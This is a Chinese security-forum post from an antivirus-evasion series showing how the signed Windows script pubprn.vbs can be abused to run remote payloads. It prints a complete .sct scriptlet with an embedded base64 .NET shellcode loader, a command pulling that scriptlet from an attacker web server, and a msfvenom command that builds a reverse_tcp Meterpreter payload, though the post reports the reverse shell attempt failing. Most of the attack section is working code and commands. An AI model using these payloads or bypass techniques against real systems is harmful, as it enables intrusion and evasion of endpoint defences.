安全矩阵

 找回密码
 立即注册
搜索
查看: 2098|回复: 0

远控免杀专题(48)-白名单pubprn.vbs执行payload

[复制链接]

8

主题

8

帖子

62

积分

注册会员

Rank: 2

积分
62
发表于 2020-3-16 19:24:58 | 显示全部楼层 |阅读模式
一、pubprn.vbs简介


在Windows 7+上,存在一个Microsoft签名的WSH脚本,名为PubPrn.vbs,该脚本位于“ C:\ Windows \ System32 \ Printing_Admin_Scripts \ en-US中。在查看此特定脚本时,很明显它正在接受用户提供的输入(通过命令行参数)并将参数传递给“GetObject()。

文件位置:C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs






这意味着我们可以运行该脚本并将其期望的两个参数传递给它。第一个参数可以是任何东西,第二个参数是通过脚本:moniker的有效负载。

注意:如果为第一个参数提供的值不是网络地址(因为它需要ServerName),则可以在调用时将“ / b”开关添加到cscript.exe,以禁止显示任何其他错误消息。






二、利用pubprn.vbs执行Payload

复现环境:
攻击机:Kali 10.211.55.5
受害机:Win7 10.211.55.8
2.1 利用pubprn.vbs执行clac.exe程序
msf.sct文件源码如下:(.sct文件生成方法可参考《远控免杀专题(39)-白名单Regsvr32.exe执行payload(VT免杀率18-58)》)
  1. <?xml version="1.0" encoding="utf-8"?>
  2. <package>
  3.   <component
  4.     id="dummy">
  5.     <registration
  6.       description="dummy"
  7.       progid="dummy"
  8.       version="1.00"
  9.       remotable="True"></registration>
  10.     <script
  11.       language="JScript"><![CDATA[function setversion() {
  12. }
  13. function debug(s) {}
  14. function base64ToStream(b) {
  15.         var enc = new ActiveXObject("System.Text.ASCIIEncoding");
  16.         var length = enc.GetByteCount_2(b);
  17.         var ba = enc.GetBytes_4(b);
  18.         var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
  19.         ba = transform.TransformFinalBlock(ba, 0, length);
  20.         var ms = new ActiveXObject("System.IO.MemoryStream");
  21.         ms.Write(ba, 0, (length / 4) * 3);
  22.         ms.Position = 0;
  23.         return ms;
  24. }

  25. var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+
  26. "AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+
  27. "dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+
  28. "ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+
  29. "AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+
  30. "RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+
  31. "eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+
  32. "cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+
  33. "aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"+
  34. "MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+
  35. "dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+
  36. "ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+
  37. "B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+
  38. "dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+
  39. "CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+
  40. "SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"+
  41. "cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"+
  42. "AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"+
  43. "AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"+
  44. "bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"+
  45. "NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+
  46. "ZW1ibHkGFwAAAARMb2FkCg8MAAAAABgAAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"+
  47. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"+
  48. "YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAUjlJXgAAAAAA"+
  49. "AAAA4AAiAAsBMAAADgAAAAgAAAAAAAAuKwAAACAAAABAAAAAAEAAACAAAAACAAAEAAAAAAAAAAQA"+
  50. "AAAAAAAAAIAAAAACAAAAAAAAAgBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA3CoA"+
  51. "AE8AAAAAQAAA4AUAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAKQpAAAcAAAAAAAAAAAAAAAAAAAA"+
  52. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"+
  53. "AAAALnRleHQAAABMDAAAACAAAAAOAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAA4AUAAABA"+
  54. "AAAABgAAABAAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAWAAAAAAAAAAAA"+
  55. "AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAABArAAAAAAAASAAAAAIABQDcIAAAyAgAAAEAAAADAAAG"+
  56. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPgIoEAAACgAA"+
  57. "KAIAAAYAKhMwBgBqAAAAAQAAEQAgFAEAAI0TAAABJdABAAAEKBEAAAoKFigSAAAKBo5pIAAQAAAo"+
  58. "EwAACiAAMAAAH0AoBAAABgsGFgcGjmkoFAAACgAWKBIAAAoWBxYoEgAAChYWKBIAAAooBQAABiYg"+
  59. "0AcAACgVAAAKACoKACoAAABCU0pCAQABAAAAAAAMAAAAdjQuMC4zMDMxOQAAAAAFAGwAAADoAgAA"+
  60. "I34AAFQDAAAABAAAI1N0cmluZ3MAAAAAVAcAAAQAAAAjVVMAWAcAABAAAAAjR1VJRAAAAGgHAABg"+
  61. "AQAAI0Jsb2IAAAAAAAAAAgAAAVeVAjQJAgAAAPoBMwAWAAABAAAAGgAAAAQAAAABAAAABQAAAAoA"+
  62. "AAAVAAAADwAAAAEAAAABAAAAAQAAAAIAAAABAAAAAQAAAAEAAAABAAAAAABkAgEAAAAAAAYA1AFO"+
  63. "AwYAQQJOAwYACAEcAw8AbgMAAAYAMAHgAgYAtwHgAgYAmAHgAgYAKALgAgYA9AHgAgYADQLgAgYA"+
  64. "RwHgAgYAHAEvAwYA+gAvAwYAewHgAgYAYgGYAgYAyAPUAgYA3wBOAwYAxADUAgYAXwLUAgYAoANO"+
  65. "AwYA8wPUAgYAsQDUAgYAFQPUAgYAsgLUAgYAtwIvAwYAqgCHAgAAAAArAAAAAAABAAEAAQAQAMwC"+
  66. "+AJBAAEAAQAAAQAANAAAAEEAAQAGABMBAAANAAAASQACAAYAMwFTAEoAUCAAAAAAhhgPAwYAAQBg"+
  67. "IAAAAACWAHwATgABANYgAAAAAJYA2wJOAAEAAAAAAIAAliCMAFIAAQAAAAAAgACWIKQAWgAFAAAA"+
  68. "AQCvAwAAAgCAAgAAAwDOAAAABADPAwAAAQB9AwAAAgB0AgAAAwC5AwAABAADAwAABQCQAwAABgCZ"+
  69. "AAkADwMBABEADwMGABkADwMKACkADwMQADEADwMQADkADwMQAEEADwMQAEkADwMQAFEADwMQAFkA"+
  70. "DwMQAGEADwMVAGkADwMQAHEADwMQAHkADwMQAIkADwMGAIEADwMGAKEA6QMgALkA2QMoAMEA5QMt"+
  71. "AMkA+QMzANEA8gI8AC4ACwBkAC4AEwBtAC4AGwCMAC4AIwCVAC4AKwCmAC4AMwCmAC4AOwCsAC4A"+
  72. "QwCVAC4ASwC7AC4AUwCmAC4AWwCmAC4AYwDcAC4AawAGAS4AcwATAWMAewBbAQEAFAEAAAQAGgC/"+
  73. "AgABCQCMAAEAAAELAKQAAQA0KwAAAQAEgAAAAQAAAAAAAAAAAAAAAAABAAAABAAAAAAAAAAAAAAA"+
  74. "QQCDAAAAAAAEAAMAAAAAQ29uc29sZUFwcDEAX19TdGF0aWNBcnJheUluaXRUeXBlU2l6ZT0yNzYA"+
  75. "PE1vZHVsZT4APFByaXZhdGVJbXBsZW1lbnRhdGlvbkRldGFpbHM+ADkyOUNFNzY2Q0ZCNzc0NEUw"+
  76. "M0ExNEY2QUM2MTE4RDlGQTBFRThCQkYAUnVuTVNGAG1zY29ybGliAFZpcnR1YWxBbGxvYwBscFRo"+
  77. "cmVhZElkAENyZWF0ZVRocmVhZABSdW50aW1lRmllbGRIYW5kbGUAVmFsdWVUeXBlAGZsQWxsb2Nh"+
  78. "dGlvblR5cGUAQ29tcGlsZXJHZW5lcmF0ZWRBdHRyaWJ1dGUAR3VpZEF0dHJpYnV0ZQBEZWJ1Z2dh"+
  79. "YmxlQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBB"+
  80. "c3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGUAQXNzZW1i"+
  81. "bHlGaWxlVmVyc2lvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbmZpZ3VyYXRpb25BdHRyaWJ1dGUAQXNz"+
  82. "ZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRl"+
  83. "AEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3Nl"+
  84. "bWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAQnl0ZQBD"+
  85. "b25zb2xlQXBwMS5leGUAZHdTdGFja1NpemUAZHdTaXplAFN5c3RlbS5UaHJlYWRpbmcAU3lzdGVt"+
  86. "LlJ1bnRpbWUuVmVyc2lvbmluZwBNYXRoAE1hcnNoYWwAa2VybmVsMzIuZGxsAFByb2dyYW0AU3lz"+
  87. "dGVtAE1haW4AU3lzdGVtLlJlZmxlY3Rpb24AU2xlZXAATVNGV3JhcHBlcgBscFBhcmFtZXRlcgAu"+
  88. "Y3RvcgBJbnRQdHIAU3lzdGVtLkRpYWdub3N0aWNzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2"+
  89. "aWNlcwBTeXN0ZW0uUnVudGltZS5Db21waWxlclNlcnZpY2VzAERlYnVnZ2luZ01vZGVzAGxwVGhy"+
  90. "ZWFkQXR0cmlidXRlcwBkd0NyZWF0aW9uRmxhZ3MAUnVudGltZUhlbHBlcnMAbHBBZGRyZXNzAGxw"+
  91. "U3RhcnRBZGRyZXNzAE9iamVjdABmbFByb3RlY3QAb3BfRXhwbGljaXQATWF4AEluaXRpYWxpemVB"+
  92. "cnJheQBDb3B5AAAAAAAAAKfNtUqzk81MuI/TZQEIB08ABCABAQgDIAABBSABARERBCABAQ4EIAEB"+
  93. "AgUHAh0FGAcAAgESVRFZBAABGAgFAAIICAgIAAQBHQUIGAgEAAEBCAi3elxWGTTgiQMGERADAAAB"+
  94. "BwAEGBgJCQkJAAYYGAkYGAkYCAEACAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dz"+
  95. "AQgBAAcBAAAAABABAAtDb25zb2xlQXBwMQAABQEAAAAADgEACU1pY3Jvc29mdAAAIAEAG0NvcHly"+
  96. "aWdodCDCqSBNaWNyb3NvZnQgMjAyMAAAKQEAJDE4ZjVmMjNhLWVjOGUtNDRmNC1iYzk3LWUxMjlk"+
  97. "M2IyNDhmYwAADAEABzEuMC4wLjAAAEcBABouTkVURnJhbWV3b3JrLFZlcnNpb249djQuMAEAVA4U"+
  98. "RnJhbWV3b3JrRGlzcGxheU5hbWUQLk5FVCBGcmFtZXdvcmsgNAQBAAAAAAAAAFI5SV4AAAAAAgAA"+
  99. "ABwBAADAKQAAwAsAAFJTRFO1QL1WXv01Q6nD2KAV97O5AQAAAGM6XHVzZXJzXHh5c291bFxkb2N1"+
  100. "bWVudHNcdmlzdWFsIHN0dWRpbyAyMDE3XFByb2plY3RzXENvbnNvbGVBcHAxXENvbnNvbGVBcHAx"+
  101. "XG9ialxEZWJ1Z1xDb25zb2xlQXBwMS5wZGIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
  102. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
  103. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
  104. "AAAAAAAAAAAAAAAABCsAAAAAAAAAAAAAHisAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAABArAAAA"+
  105. "AAAAAAAAAAAAX0NvckV4ZU1haW4AbXNjb3JlZS5kbGwAAAAAAP8lACBAAPxIg+Tw6MAAAABBUUFQ"+
  106. "UlFWSDHSZUiLUmBIi1IYSItSIEiLclBID7dKSk0xyUgxwKw8YXwCLCBBwckNQQHB4u1SQVFIi1Ig"+
  107. "i0I8SAHQi4CIAAAASIXAdGdIAdBQi0gYRItAIEkB0ONWSP/JQYs0iEgB1k0xyUgxwKxBwckNQQHB"+
  108. "OOB18UwDTCQIRTnRddhYRItAJEkB0GZBiwxIRItAHEkB0EGLBIhIAdBBWEFYXllaQVhBWUFaSIPs"+
  109. "IEFS/+BYQVlaSIsS6Vf///9dSLoBAAAAAAAAAEiNjQEBAABBujGLb4f/1bvwtaJWQbqmlb2d/9VI"+
  110. "g8QoPAZ8CoD74HUFu0cTcm9qAFlBidr/1WNhbGMuZXhlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
  111. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
  112. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
  113. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
  114. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
  115. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
  116. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
  117. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
  118. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACABAAAAAgAACAGAAAAFAAAIAAAAAAAAAA"+
  119. "AAAAAAAAAAEAAQAAADgAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAEA"+
  120. "AQAAAGgAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAOADAACQQAAAUAMAAAAAAAAAAAAAUAM0AAAAVgBT"+
  121. "AF8AVgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAABAAAAAAAAAAEAAAAAAD8A"+
  122. "AAAAAAAABAAAAAEAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAA"+
  123. "ACQABAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBLACAAABAFMAdAByAGkAbgBnAEYA"+
  124. "aQBsAGUASQBuAGYAbwAAAIwCAAABADAAMAAwADAAMAA0AGIAMAAAABoAAQABAEMAbwBtAG0AZQBu"+
  125. "AHQAcwAAAAAAAAA0AAoAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUAAAAAAE0AaQBjAHIAbwBzAG8A"+
  126. "ZgB0AAAAQAAMAAEARgBpAGwAZQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AAAAAAEMAbwBuAHMAbwBs"+
  127. "AGUAQQBwAHAAMQAAADAACAABAEYAaQBsAGUAVgBlAHIAcwBpAG8AbgAAAAAAMQAuADAALgAwAC4A"+
  128. "MAAAAEAAEAABAEkAbgB0AGUAcgBuAGEAbABOAGEAbQBlAAAAQwBvAG4AcwBvAGwAZQBBAHAAcAAx"+
  129. "AC4AZQB4AGUAAABaABsAAQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQAAABDAG8AcAB5AHIA"+
  130. "aQBnAGgAdAAgAKkAIABNAGkAYwByAG8AcwBvAGYAdAAgADIAMAAyADAAAAAAACoAAQABAEwAZQBn"+
  131. "AGEAbABUAHIAYQBkAGUAbQBhAHIAawBzAAAAAAAAAAAASAAQAAEATwByAGkAZwBpAG4AYQBsAEYA"+
  132. "aQBsAGUAbgBhAG0AZQAAAEMAbwBuAHMAbwBsAGUAQQBwAHAAMQAuAGUAeABlAAAAOAAMAAEAUABy"+
  133. "AG8AZAB1AGMAdABOAGEAbQBlAAAAAABDAG8AbgBzAG8AbABlAEEAcABwADEAAAA0AAgAAQBQAHIA"+
  134. "bwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAOAAIAAEAQQBzAHMAZQBt"+
  135. "AGIAbAB5ACAAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAADwQwAA6gEAAAAAAAAAAAAA"+
  136. "77u/PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiIHN0YW5kYWxvbmU9InllcyI/"+
  137. "Pg0KDQo8YXNzZW1ibHkgeG1sbnM9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206YXNtLnYxIiBt"+
  138. "YW5pZmVzdFZlcnNpb249IjEuMCI+DQogIDxhc3NlbWJseUlkZW50aXR5IHZlcnNpb249IjEuMC4w"+
  139. "LjAiIG5hbWU9Ik15QXBwbGljYXRpb24uYXBwIi8+DQogIDx0cnVzdEluZm8geG1sbnM9InVybjpz"+
  140. "Y2hlbWFzLW1pY3Jvc29mdC1jb206YXNtLnYyIj4NCiAgICA8c2VjdXJpdHk+DQogICAgICA8cmVx"+
  141. "dWVzdGVkUHJpdmlsZWdlcyB4bWxucz0idXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTphc20udjMi"+
  142. "Pg0KICAgICAgICA8cmVxdWVzdGVkRXhlY3V0aW9uTGV2ZWwgbGV2ZWw9ImFzSW52b2tlciIgdWlB"+
  143. "Y2Nlc3M9ImZhbHNlIi8+DQogICAgICA8L3JlcXVlc3RlZFByaXZpbGVnZXM+DQogICAgPC9zZWN1"+
  144. "cml0eT4NCiAgPC90cnVzdEluZm8+DQo8L2Fzc2VtYmx5PgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
  145. "AAAAAAAAAAAAAAAAAAAAACAAAAwAAAAwOwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
  146. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
  147. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
  148. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
  149. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
  150. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
  151. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
  152. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
  153. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
  154. "AAAAAAAAAAAAAAAAAAABDQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVmbGVj"+
  155. "dGlvbi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkIAAAACgsA";
  156. var entry_class = 'MSFWrapper.Program';

  157. try {
  158.         setversion();
  159.         var stm = base64ToStream(serialized_obj);
  160.         var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
  161.         var al = new ActiveXObject('System.Collections.ArrayList');
  162.         var d = fmt.Deserialize_2(stm);
  163.         al.Add(undefined);
  164.         var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);
  165.        
  166. } catch (e) {
  167.     debug(e.message);
  168. }]]></script>
  169.   </component>
  170. </package>
复制代码

将msf.sct文件放在Kali系统的网站根目录下





在Win7系统中执行:

  1. <pre class="code-snippet__js" data-lang=""><font size="3"><code style="border-radius: 0px;white-space: pre;display: flex;font-family: Consolas, &quot;Liberation Mono&quot;, Menlo, Courier, monospace;"><span class="code-snippet_outer" style="line-height: 26px;">C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:http://10.211.55.5/msf.sct</span></code></font></pre>
复制代码
通过实验,可以弹出计算器应用程序。



2.2 利用pubprn.vbs反弹shell
1、在Kali中利用msfvenom生成C# shellcode
  1. msfvenom -p windows/meterpreter/reverse_tcp -a x86 -f csharp -b "\x00\xff" LHOST=10.211.55.5 LPORT=4444 -o shell_x86.csharp
复制代码




2、制作sct文件
参考《远控免杀专题(39)-白名单Regsvr32.exe执行payload(VT免杀率18-58)》中sct制作方法,大致步骤:
(1)利用VS 2017创建C# Console工程,.Net版本建议2.0,这样兼容性好一 些,如果选了了net 4.0。其他电脑上没有装4.0的话可能就没法运⾏了;
(2)把C# shellcode内容放到相应MsfPayload位置;
(3)编译生成exe文件;
(4)将exe转换为sct脚本⽂文件;
利用工具:DotNetToJScript
  1. https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/DotNetToJScript.zip
复制代码

3、配置Kali msf





4、pubprn.vbs执行payload
将生成的shellcode sct文件放置在Kali web根目录下,在Win7中利用pubprn.vbs执行sct文件。
  1. C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:http://10.211.55.5/shellxxx2.sct
复制代码

但是始终没有上线……

5、仔细参考《远控免杀专题(39)-白名单Regsvr32.exe执行payload(VT免杀率18-58)》后,发现还需要替换sct文件的头部和尾部。但是,将头部和尾部替换后执行Payload依旧上线不了,考虑利用上面执行calc.exe的sct文件执行反弹shell的shellcode(即将自己生成的sct中的shellcode放在msf.sct中),依旧不行!
这是一个失败的案例,先记录这些后续继续补充~~~
上线后此进行立即结束
三、总结
pubprn.vbs程序仅可以用于命令执行,无法反弹主机shell。在不安装杀软的情况下,又可以直接执行系统命令,无需使用pubprn.vbs程序;在安装杀软的情况下,使用pubprn.vbs程序,360安全卫士会进行行为报警,如果执行添加系统用户这种命令,则会触发360安全卫士的行为报警+添加用户报警。




本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-3-29 04:01 , Processed in 0.015477 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表